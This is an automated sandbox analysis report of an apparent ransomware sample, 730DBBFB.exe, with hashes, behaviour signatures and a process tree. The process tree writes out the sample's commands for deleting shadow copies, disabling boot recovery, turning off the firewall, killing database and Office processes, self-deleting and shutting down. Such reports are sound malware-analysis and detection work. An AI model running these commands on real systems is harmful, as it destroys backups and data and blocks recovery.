Analysis
-
max time kernel
57s -
max time network
83s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
27-07-2021 03:33
Errors
Reason
Remote task has failed: Machine shutdown
General
-
Target
730DBBFB.exe
-
Size
169KB
-
MD5
65c3956288e16bdcc55e3c9c6b94ba5b
-
SHA1
33aa83e00711a32e0960dcf670ae2fa891049170
-
SHA256
e7fe3b83e1730593d372b5a848e84066c07d75ee4790395a258822cfb8502412
-
SHA512
813db16eeacf96589468881872ec15e55760dacf27f90060298972036ab22243337abd5f9bce266063a89fccc45ded069cb4bb4172946acc4a54e5ac49853c76
Score
9/10
Malware Config
Signatures
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
-
Modifies Windows Firewall 1 TTPs
-
Modifies extensions of user files 2 IoCs
Ransomware generally changes the extension on encrypted files.
-
Deletes itself 1 IoCs
-
Drops file in Program Files directory 2 IoCs
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
-
Kills process with taskkill 13 IoCs
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 62 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\730DBBFB.exe"C:\Users\Admin\AppData\Local\Temp\730DBBFB.exe"1⤵
- Modifies extensions of user files
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd.exe /c vssadmin delete shadows /all /quiet2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet3⤵
- Interacts with shadow copies
-
C:\Windows\system32\cmd.execmd.exe /c wmic shadowcopy delete /nointeractive2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic shadowcopy delete /nointeractive3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.execmd.exe /c bcdedit /set {current} bootstatuspolicy ignoreallfailures2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\bcdedit.exebcdedit /set {current} bootstatuspolicy ignoreallfailures3⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\cmd.execmd.exe /c bcdedit /set {current} recoveryenabled no2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\bcdedit.exebcdedit /set {current} recoveryenabled no3⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\cmd.execmd.exe /c netsh advfirewall set allprofiles state off2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off3⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im note*2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im note*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im powerpnt*2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im powerpnt*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im tomcat*2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im tomcat*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im java*2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im java*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im vee*2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im vee*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im post*2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im post*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im mys*2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im mys*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im python*2⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im apache*2⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im sql*2⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im Exchange*2⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im excel*2⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im winword*2⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c ping 127.0.0.1>nul & del /q C:\Users\Admin\AppData\Local\Temp\730DBBFB.exe & shutdown -s -t 02⤵
- Deletes itself
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.13⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\shutdown.exeshutdown -s -t 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im excel*1⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Exchange*1⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im sql*1⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im python*1⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im apache*1⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im winword*1⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x01⤵
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x5781⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x11⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/220-83-0x0000000000000000-mapping.dmp
-
memory/228-82-0x0000000000000000-mapping.dmp
-
memory/564-79-0x0000000000000000-mapping.dmp
-
memory/592-60-0x0000000010000000-0x000000001001C000-memory.dmpFilesize
112KB
-
memory/640-84-0x0000000000000000-mapping.dmp
-
memory/820-71-0x0000000000000000-mapping.dmp
-
memory/824-69-0x0000000000000000-mapping.dmp
-
memory/908-73-0x0000000000000000-mapping.dmp
-
memory/1072-89-0x0000000000000000-mapping.dmp
-
memory/1172-80-0x0000000000000000-mapping.dmp
-
memory/1192-75-0x0000000000000000-mapping.dmp
-
memory/1228-68-0x0000000000000000-mapping.dmp
-
memory/1228-72-0x000007FEFB9A1000-0x000007FEFB9A3000-memory.dmpFilesize
8KB
-
memory/1300-78-0x0000000000000000-mapping.dmp
-
memory/1332-70-0x0000000000000000-mapping.dmp
-
memory/1372-67-0x0000000000000000-mapping.dmp
-
memory/1452-74-0x0000000000000000-mapping.dmp
-
memory/1504-77-0x0000000000000000-mapping.dmp
-
memory/1580-90-0x0000000000000000-mapping.dmp
-
memory/1612-88-0x0000000000000000-mapping.dmp
-
memory/1772-76-0x0000000000000000-mapping.dmp
-
memory/1812-87-0x0000000000000000-mapping.dmp
-
memory/1908-62-0x0000000000000000-mapping.dmp
-
memory/1928-63-0x0000000000000000-mapping.dmp
-
memory/1936-86-0x0000000000000000-mapping.dmp
-
memory/1964-81-0x0000000000000000-mapping.dmp
-
memory/2008-64-0x0000000000000000-mapping.dmp
-
memory/2012-85-0x0000000000000000-mapping.dmp
-
memory/2028-65-0x0000000000000000-mapping.dmp
-
memory/2032-66-0x0000000000000000-mapping.dmp
-
memory/2052-91-0x0000000000000000-mapping.dmp
-
memory/2080-92-0x0000000000000000-mapping.dmp
-
memory/2108-93-0x0000000000000000-mapping.dmp
-
memory/2144-94-0x0000000000000000-mapping.dmp
-
memory/2164-95-0x0000000000000000-mapping.dmp
-
memory/2232-96-0x0000000000000000-mapping.dmp
-
memory/2244-97-0x0000000000000000-mapping.dmp
-
memory/2256-98-0x0000000000000000-mapping.dmp
-
memory/2656-99-0x0000000000000000-mapping.dmp
-
memory/2684-100-0x0000000000000000-mapping.dmp
-
memory/2716-101-0x0000000000000000-mapping.dmp
-
memory/2744-103-0x0000000002840000-0x0000000002841000-memory.dmpFilesize
4KB
-
memory/2948-105-0x00000000026E0000-0x00000000026E1000-memory.dmpFilesize
4KB